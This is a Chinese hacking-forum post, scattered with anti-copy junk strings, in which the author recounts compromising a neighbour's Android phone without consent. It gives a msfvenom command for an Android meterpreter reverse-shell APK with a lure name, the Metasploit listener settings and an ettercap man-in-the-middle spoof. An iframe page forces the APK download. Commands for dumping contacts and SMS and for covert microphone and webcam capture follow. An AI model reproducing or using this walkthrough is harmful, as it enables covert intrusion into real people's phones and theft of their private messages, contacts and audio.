找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1345|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

5 h- a3 O: m7 q) W) c 五、msf+ettercap入侵邻居安卓手机 7 l g0 m: Z9 t- {( F. }: \

& S! }' [4 m4 o4 e) Q

0 S$ r3 N& D5 p K W 首先启动msf ) M# r* P7 v$ h2 z w/ U

' ^/ o. T; d( i

% p- @ m& |" f7 ^2 u6 z) H 先用kali生成一个安卓木马,如下命令: 5 Z6 u" k! w) A7 r1 ]9 W7 p

2 Y6 _7 J9 V9 D9 I1 O% V5 @: N

4 H8 o9 ], O8 W7 p Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 5 _1 R) D4 g1 w. r% b2 E

% S3 ^# |7 n, u. u8 {

" j5 L x N0 A& i% ^, p# `) P- U 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 , e! L, M* }* @' R

% f; a1 D1 r" g# j* B5 \

% U2 F: M- e& Z 然后进入msf $ V; M3 \5 I; K, l4 C( ]$ t

- r; l% Z: C/ i6 q2 r/ Y

( `: E6 [/ O3 l2 _' N9 i& C use exploit/multi/handler 7 ~5 t5 `$ p6 a

. E: h7 Y! h0 v, e$ c' B! p

' U6 h" h/ p, M( q0 O/ H: b3 w set payload android/meterpreter/reverse_tcp L6 u% B" G9 `$ c6 S8 A0 x

I6 Q4 H8 M, s5 \- K r

/ U2 J; a9 |/ B0 g" [& x' ~3 v/ d set LHOST 192.168.0.109 //ipkailiip ' l+ J' j0 R1 X

1 x& T; {: L2 i

/ w+ z0 k. T. d set LPORT 44444 //端口一定要与前面生成的木马的端口一致 9 u1 u- o0 B" t

7 c$ B9 t6 h3 P

3 t( N1 A7 m& ?" E0 ~' B3 A Exploit 3 b% ^+ ^$ T$ p2 Y$ Y6 ^# y

- R! E5 J, e7 ]& E8 x# H

# c& ^ }8 }/ S% Z& f% `5 J   ) t2 g8 \' c, ^+ v

' [+ A5 ? F7 t5 S; j# x

1 e% p; z- w1 `" H. ] 下面我们开启ettercap -G # R2 k+ b4 [+ h" v, S8 k

$ Q7 S) }" y% V8 e4 Y

) w, r; C9 K0 ]7 b- K 我物理IP # O* A4 r/ @3 d9 k5 k8 A

7 T# t" T$ o* H. f u b

c+ Y9 G5 m4 S5 G( l$ ?   ( c; L3 \* E- H8 v+ Y2 o

! F( i4 B d8 \" s

V4 T% H# r$ X+ Y6 R2 u4 y# z s 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 5 e! a5 Y3 S8 L1 k% }

9 A' o$ S' R9 m" M. D; G0 n, ^

5 n- R7 U5 n# I* c; L+ o% F$ B 下面我们来设置一下 2 g# ~4 W- X. C. _; z/ G

* e& w5 G9 z! W O5 T7 `/ ]

* c! [1 ^2 B; U$ [$ V/ ^" f   9 u5 b! k, N r* M4 T

# Y% v8 I! B6 m1 W; s4 }

( g" p( E* ^6 u 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, , U# _% m5 D$ P! g& P* H

' [8 g1 A# @ u7 b* N

9 J. G n8 J A& M& w* W   . _. I) x3 s) Q; P- l

; Y/ \/ W% i, N8 t- |1 @

' @6 D7 O' K5 D* Z   - j) |9 j# A6 S+ d* n8 O m) Y b% c3 J

+ v3 [" w. ]; }2 O" B4 }

\9 ?& N$ r& Q+ G2 q   1 K& w, @' o% `* R2 K" \

9 x' J* d) Z% Z8 _. M( B7 W& l

7 I+ e. k3 h# z   R( Y) c- `6 U- ]4 H3 s0 f

8 ~) g& |* M& n$ k) I

& } X2 ~' J! P$ s   ) S( {! l/ ~ a! V& X' }4 Z: O( Z

4 i2 T/ e2 G" p) f

8 u0 `' X2 @6 P1 w. _+ {+ j   . W6 I% R! T9 e3 _0 B, } N ^

) R0 N- @$ ?- D2 i( k: X

: x7 K) o9 \# a$ y; E( p   ! v* j/ G K' r, P

+ J* Y- N1 A8 }3 a0 L' X. ^9 O

7 U0 `# o( B* m6 t3 d9 n8 r   4 K) _: y" g& t3 p

2 ^8 A+ M4 k; d/ i' G3 I

% j. p! b, a/ G   8 ]' _1 g; N8 Q3 h

1 H# {% F- c9 s% r) ?" T

2 L- `. j) a& G8 C+ h   1 ]) \- L" N D3 @- t. M

# n( k* y$ I5 y

/ L5 ~" I1 G7 n9 ]2 G/ c   ! Z: X& u7 E8 N9 Q: p R

8 L2 I6 V9 F3 f" L

& V, Q1 A6 L; Z t* v: Y; U   1 |: i7 Q; ?( L) s0 V

0 B/ `( H' V4 ~1 w

+ \% `1 F( S3 Q4 D+ E$ ], s   / S1 Q" \1 i; z! |

+ G0 e+ }: s) w+ V2 L# A9 s

6 E% g) a5 X5 L* C3 R0 z0 ?0 G 下面我们开始攻击 - A1 Z, e9 c3 v0 z) i

; [* i, |0 [. p/ y# ` t) k+ t, R& b

* C. x/ d9 \/ Q) h* c7 j   7 ]9 c7 \- L2 W7 _$ O

+ D# P7 a3 z% L) z

5 Q f) u: L* i* U4 |0 S3 S   ! i& [( v, u0 z' ~3 v

1 \& a5 Q& g( C/ z3 s. p

1 ~" n' j1 U/ G' ?9 y9 C- F" Z   X B. |& s, [/ J5 D

, s+ S) ?# Z" Q p

0 t) l: k5 _2 o   & p2 g7 f4 C7 J

+ r, N5 s# \4 z8 m8 N. W0 }# x

9 U1 O/ H9 y9 G! A& N   8 W# Z/ z4 |+ r

: @4 E& }1 y' k, X+ y9 c& ?

* B/ w- a4 ]$ Q 大概过了5分钟多,发现反弹成功了 ! k' n& c6 x( `( H1 a& }# }2 Z$ U

' S# z b+ U. M7 T

/ k6 }$ Z. _' U   - \ G I; u$ b% D! r

/ B& I9 a o1 y) p8 \* a

4 Q8 O. w, z& i3 B! G# g% W, ^   - z, F- W/ ~+ x! J# Q

3 J- u3 [# R7 C

% q% C2 d9 _3 O7 a* X6 |   9 z: B, r: p. r2 H( a8 n

0 F! [; H* b& l! V! z) S

$ ]" M! Y5 y; ?5 S4 i   9 y+ x3 e* N7 |: b5 U

" j" E0 `' l8 ?9 v

5 s. |% {/ I4 c! [   ( x" L# K5 `, t/ G7 K$ ?* K0 T3 k0 J; u$ N

4 f( g" c$ ]6 K' w! E/ K, J8 k

. B. V$ R+ U% \+ P& G) Y1 H   ! B1 |+ p T0 D: ~

4 ?/ w6 h) A A" e5 n6 H

! k4 g6 o5 d( S   4 @: g% J% {+ l: B

2 t) k* a" h$ l/ t

& z$ |1 I, P& t# h 执行命令 7 ?' U' l v* i

8 n0 t7 l- H: \

9 p9 p2 m& v. L   6 [9 H/ o1 K9 Z2 ]- N- ^6 c

$ g3 q9 H! O0 J$ i/ [* A7 y& F

3 U2 c9 {( U) t& M% [9 t dump_contacts    --》这个是导出电话 : I [$ o/ ]; h

' u- v% m( h9 u

8 E/ w1 B' L; S* g dump_sms --》这个是导出信息 2 L$ b5 S6 q6 c$ w# {, L( C

7 f- y3 P- b$ P$ e- S. R) a

) H& {% C$ a4 B" T' [4 e8 I record_mic     Record audio from the default microphone for X seconds ! k4 u' c% }. h# {

) L* {6 u1 r G: x# S1 c

0 |+ W9 J& G7 l5 h1 d0 k. ]     webcam_chat    Start a video chat 2 V U' f `9 S* {* z

4 ]. M5 g- L+ d% f2 G

# ]1 b4 z9 t2 ^5 W- U9 j' L     webcam_list    List webcams % m0 T4 d: C/ E$ a/ w

$ J9 i/ c! l* t% j4 O/ j. ^

& w" r+ t0 \, d6 ]2 ?/ u     webcam_snap    Take a snapshot from the specified webcam " v0 M& x* X) \4 r( Y# a/ D

7 G( n* u3 q7 |. ~9 P. j

/ b+ j4 E, e+ p" X. S webcam_stream  lay a video stream from the specified webcam 9 |& g) O6 N2 j9 H# l# ?1 b

" A b# D0 x: k7 \

- T, |8 i3 i4 b) k \   ! N$ H6 L- Y4 E% v3 ?- d! t$ N0 D

; t+ X( J2 \! v& x+ `' o. `& {( F

# @% U; Q" l( G3 {8 C   " r S4 s+ W7 S" Z

0 N3 `$ Z _0 T$ j/ I% H1 p G$ y- n7 ^

0 _8 L- L- L u$ L 我们打开看一下电话薄, , S6 X {3 l$ A% Y4 h* W

$ e/ ]7 u" L) B* u5 Y7 @

& }1 L$ `& N% r: K; O C4 _/ {( d   - E7 f. L8 q4 ~6 f

+ ^3 {. J5 T2 L, Y# X

& a% F$ d' G- ^; D3 X   % G4 c% o9 l0 q8 r

9 m0 X6 g/ j% g/ m. s' O0 o$ S; l% S

8 Y# W! {2 d4 ~7 @7 H   : }+ ~+ H* Z" l, n) Q& A- w0 Q! X

/ X, Q" U! s/ j' ~5 T2 E* b

% ^# p7 k9 i* k+ ?1 d$ }! w   9 r! E( F4 J. R' c7 `3 p

/ `; v+ e+ H! _( r3 V

5 [- _! J5 s1 W* q1 F   & H2 V$ l s) y2 ~- o

0 z2 {9 S& m+ @, C

& T. {8 W) V; V9 d   : D. L4 w" R$ V0 b2 N% D. q

. f4 Q% G. Z( o; W; @' [

; T8 m# n% M+ I/ ^' t1 F' S5 x 我们同时欺骗成DroidJack木马,使用方法如图: / W3 {4 a: k6 N3 v

" _1 H1 P* [0 {6 v" [

. {0 [. N, U5 t   1 A! x& e/ C! d- X, j

) }; N$ s3 D* E# D& K) I7 i1 o

4 O* j/ f) G8 K A0 f& p" z4 a   $ Q, V/ u+ {# I# o0 M, ?

+ y3 f, Y. P3 S7 H

( h0 d4 S7 A3 O5 m; k9 R   - j" r% Q2 d5 j8 a

0 j( n( \% H9 [; y2 @2 M, L

+ E; _: [! J% U/ A/ _. t 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 & L% h# X7 O1 ^- E `: W) L9 C

f9 @, y, E2 J; P: }. u

5 L, f/ ^1 r& D4 x$ @   / f3 w" s) G3 H

9 ]! k' S: D- G" V) y" ~2 ~

- m/ m" V/ g% ]$ _; h) r. [: Q   ( F( z% ?( X+ f" v6 @; c

" e" F( j7 T4 p! t" f

9 ^; X t i$ G" ]) ]+ P   " P5 S( f5 p3 i2 G/ I3 ~. n

0 u5 @6 u7 Y& l* u/ ~# t8 Q/ f

% i! u- O1 r9 b, b - c/ \3 ?' U- X' I/ Y7 N

9 x0 P/ @: O5 W( p

8 R/ t0 _# ?. ~9 k6 c% i8 A
4 l3 {- C# C# v1 Q# P

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表